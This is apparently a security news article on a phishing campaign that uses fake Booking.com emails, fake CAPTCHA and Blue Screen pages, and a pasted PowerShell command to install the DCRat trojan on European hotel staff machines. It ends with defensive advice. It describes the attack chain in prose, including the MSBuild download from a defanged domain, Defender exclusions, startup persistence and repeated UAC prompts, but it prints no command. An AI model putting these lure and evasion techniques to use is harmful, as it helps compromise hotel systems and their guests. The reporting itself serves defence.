Fake Booking Emails Redirect Hotel Staff to Malware‑Loaded BSoD Pages: A Sophisticated European Hospitality Sector Attack

Cybersecurity researchers have uncovered a sophisticated phishing and malware campaign that is targeting hotel staff across the European hospitality sector by leveraging fake emails that appear to come from Booking.com and other legitimate online travel platforms. The goal of this multi‑stage attack is to deliver a remote access trojan (RAT) known as DCRat to compromised systems by redirecting unsuspecting victims to convincing fake pages — including phony Blue Screen of Death (BSoD) fixers — and tricking them into executing malicious commands.

The campaign, identified by cybersecurity firm Securonix as PHALT#BLYX, demonstrates how threat actors are increasingly combining social engineering, living‑off‑the‑land (LotL) techniques, and deception‑based lures to bypass security protections and establish long‑term access to targeted networks.

How the Attack Begins: Deceptive Emails That Look Real

The attack chain starts with a phishing email impersonating Booking.com — one of the world’s most widely used hotel booking services. These fake emails are crafted to look extremely convincing, containing familiar branding, reservation details, and messages that seem pressing and business‑critical. Among the typical subject lines and content are warnings about:

Unexpected booking cancellations
Reservation updates requiring action
Urgent verification of booking details

Recipients are urged to click a provided link to confirm or verify the booking status. Because the messages use real‑looking reservation details, dates, and subtle contextual cues, they can easily fool hotel administrative staff who deal with such emails daily.

By exploiting the trust inherent in familiar travel platforms, attackers reduce suspicion and increase the likelihood that targets will interact with the malicious links. This is a classic example of social engineering at scale — not relying on advanced zero‑day exploits, but rather on manipulating human behavior to trigger the breach.

ClickFix‑Style Redirection: The Deception Deepens

Once the recipient clicks on the link in the email, the campaign moves into its next phase: redirection to a fake Booking.com‑like website. The URLs used are often carefully chosen domains such as low‑house[.]com that mask their true intent while containing subtle clues to appear legitimate.

Instead of taking the victim to the actual Booking.com site, the link goes through a ClickFix‑style chain of redirects — a growing social‑engineering technique that has been observed in multiple phishing campaigns. The victim first sees a lookalike CAPTCHA screen, ostensibly designed to “verify that you’re human.”

Fake CAPTCHA pages are a key part of modern phishing tactics: they give victims a veneer of interaction that feels familiar while feeding them into the next bait — a bogus Blue Screen of Death (BSoD) or fix page that promises a solution to a non‑existent problem.

On this fake BSoD page, victims are instructed to follow specific “recovery instructions” — typically involving opening the Windows Run dialog and pasting a provided command. Executing this command sets in motion the second stage of the attack: the silent execution of malicious PowerShell commands.

Malicious Payload: DCRat Takes Hold

The core objective of the campaign is to deliver and execute DCRat (Dark Crystal RAT) on victim systems. This remote access trojan is an off‑the‑shelf .NET‑based RAT with a plugin‑based extension architecture capable of:

Harvesting sensitive information
Logging keystrokes
Running arbitrary commands sent by the attacker
Deploying additional payloads such as cryptocurrency miners
Actively interacting with the compromised machine

To achieve this, the initial PowerShell command executed by the victim’s system performs several actions behind the scenes:

It downloads an MSBuild project file (v.proj) from a remote server (2fa‑bns[.]com).
It runs this project file using MSBuild.exe, which in turn executes an embedded payload.
The code configures Microsoft Defender Antivirus exclusions to evade detection by endpoint protection platforms.
It sets up persistence mechanisms — typically placing files in the Startup folder to ensure the malware runs after reboot.
Finally, it launches the DCRat malware, which connects back to the attacker’s command‑and‑control (C2) server and awaits instructions.

If the malware does not execute with administrator rights, it doesn’t simply fail; instead, it enters a loop that repeatedly triggers Windows User Account Control (UAC) prompts in hopes that the victim will eventually grant elevated permissions out of frustration or misunderstanding.

This is a hallmark of living‑off‑the‑land (LotL) tactics, where attackers abuse legitimate binaries and tools — such as PowerShell and MSBuild.exe — to carry out malicious actions without raising the usual flags that traditional security tools watch for.

Distraction Tactic: Redirecting to Legitimate Sites

To make the interaction seem less suspicious, the attackers include a clever distraction: after the PowerShell script runs, it simultaneously opens the real Booking.com admin page in the victim’s default web browser. This gives the victim the impression that they are performing a legitimate action related to their work, obscuring the fact that their system has already been compromised.

This distraction is a psychological trick — it reassures victims that they landed on a legitimate site and that “everything looks normal now,” reducing the likelihood that they will suspect malicious activity even after the compromise has occurred.

Who Is Being Targeted? Focus on the Hospitality Industry

While many phishing campaigns indiscriminately target consumers and business users alike, this one is finely tuned to the hospitality sector, particularly hotel chains and property administrators that routinely handle Booking.com communications.

Researchers note that the phishing emails often contain room charge details denominated in Euros, suggesting a strong focus on European organizations — a region with a large tourism and hospitality industry where real‑world travel and booking demands are high.

Hotel staff and booking administrators are particularly valuable targets because they:

Frequently receive and process reservation emails.
Deal with high volumes of time‑sensitive messages.
Are more likely to click links that promise to confirm or correct booking details.
Have access to internal booking systems, customer data, and payment information.

These factors make them ideal candidates for attackers seeking both access and credibility. Once attackers have a foothold in hotel networks, they can often move laterally or leverage the compromised systems to impersonate staff and reach customers with further fraud.

Why This Campaign Is So Dangerous

This attack stands out for several reasons:

1. Multi‑Stage Social Engineering

The campaign doesn’t rely on a single malicious batch email; it uses multiple layers of social engineering — from fake booking notifications to CAPTCHA screens to BSoD fix prompts — to guide victims through an infection process step by step, lowering suspicion at each stage.

2. Abuse of Legitimate Tools

Instead of shipping a standalone malware binary that could be detected by antivirus tools, the attackers use PowerShell scripts and MSBuild.exe — trusted Windows components — to pull down the payload and execute it. This technique makes it harder for defensive tools to spot malicious activity.

3. Persistence and Defender Evasion

By setting up Defender exclusions and persistence in the startup folder, the malware ensures that even after a reboot or superficial cleanup attempts, it continues to run and reinfect the system.

4. Dual Purpose: Compromise and Monetization

DCRat doesn’t just give attackers initial access; it provides a platform for extended control. From stealing login credentials to capturing keystrokes and executing further payloads, the infected system becomes an asset in the attacker’s botnet or fraud infrastructure.

Broader Context: Hospitality Sector Already a Frequent Target

This attack is part of a broader trend in which cybercriminals and phishing gangs target hotel systems and online travel platforms to harvest credentials, payment data, and other sensitive information.

Previous campaigns have leveraged variations of similar tactics: fake CAPTCHA challenges, look‑alike URLs targeting booking confirmations, and malware deployment via compromised hotel admin email accounts.

One campaign reported in 2025 involved malvertising and credential‑stealing techniques tied to fake booking confirmations that redirect victims to fraudulent web pages.

Hospitality workers are consistently prime targets due to their exposure to frequent guest communications, time‑critical reservations, and the high trust placed in messages that appear to come from platforms like Booking.com.

The Risks Extend Beyond Staff to Guests

Once hotel systems are compromised, attackers can expand their campaign to target actual customers. Guest information stored in compromised systems — including email addresses, reservation details, and contact information — can be used in follow‑up phishing or scam messages designed to trick guests into revealing payment details or clicking further malicious links.

In some reported cases from earlier campaigns, attackers have sent fake emails or WhatsApp messages to guests with real reservation details to create credibility before redirecting them to phishing or malware pages.

This extends the risk from hotel systems to countless travelers and customers, making it a broader consumer threat.

How Organizations Can Defend Against This Threat

Given the highly targeted nature of the campaign, defensive measures must span technical controls, user awareness, and operational safeguards:

1. Staff Education and Awareness

Hotel staff — especially those who handle guest bookings and administrative emails — should receive regular training on cyber threats. They should be taught to:

Verify email sender addresses and URLs before clicking.
Hover over links to confirm their true destination.
Avoid executing commands received from unverified sources.
Treat unusual or high‑pressure requests with skepticism.

Training can significantly reduce the effectiveness of social engineering lures.

2. Multi‑Factor Authentication (MFA)

For platforms like Booking.com, Expedia, and internal hotel systems, enabling MFA can help prevent unauthorized access even if credentials are compromised.

3. Endpoint Detection and Response (EDR)

Hotels should deploy robust EDR solutions capable of detecting living‑off‑the‑land execution techniques, anomalous PowerShell behavior, and unusual persistence mechanisms. These tools can raise alerts when trusted binaries are used in suspicious ways.

4. Email Filtering and Anti‑Phishing Tools

Advanced email security solutions can block phishing emails before they reach staff inboxes by analyzing link reputations, domain spoofing attempts, and other threat signals.

5. Incident Response Plans

Hospitality organizations should have formal incident response plans that include steps for identifying, containing, and remediating malware infections, including isolating infected hosts and resetting potentially compromised credentials.

Conclusion: A Growing Threat to an Important Industry

The PHALT#BLYX campaign targeting hotel staff via fake booking emails is a stark reminder of how social engineering and modern malware delivery techniques can combine to bypass traditional security mechanisms.

By posing as familiar, trusted communications from well‑known travel platforms, attackers can lure hotel administrators into executing seemingly routine tasks that result in serious system compromise and long‑term access by threat actors.

For an industry that relies heavily on timely and accurate communications to serve millions of travelers worldwide, this kind of targeted attack — combining deceptive emails, ClickFix‑style lures, and advanced malware — represents a significant operational and reputational risk.

Staying ahead of these campaigns requires a combination of vigilance, awareness, technical defenses, and industry collaboration — because as attackers evolve their tactics, so too must the defenses guarding sensitive hospitality infrastructure and customer data.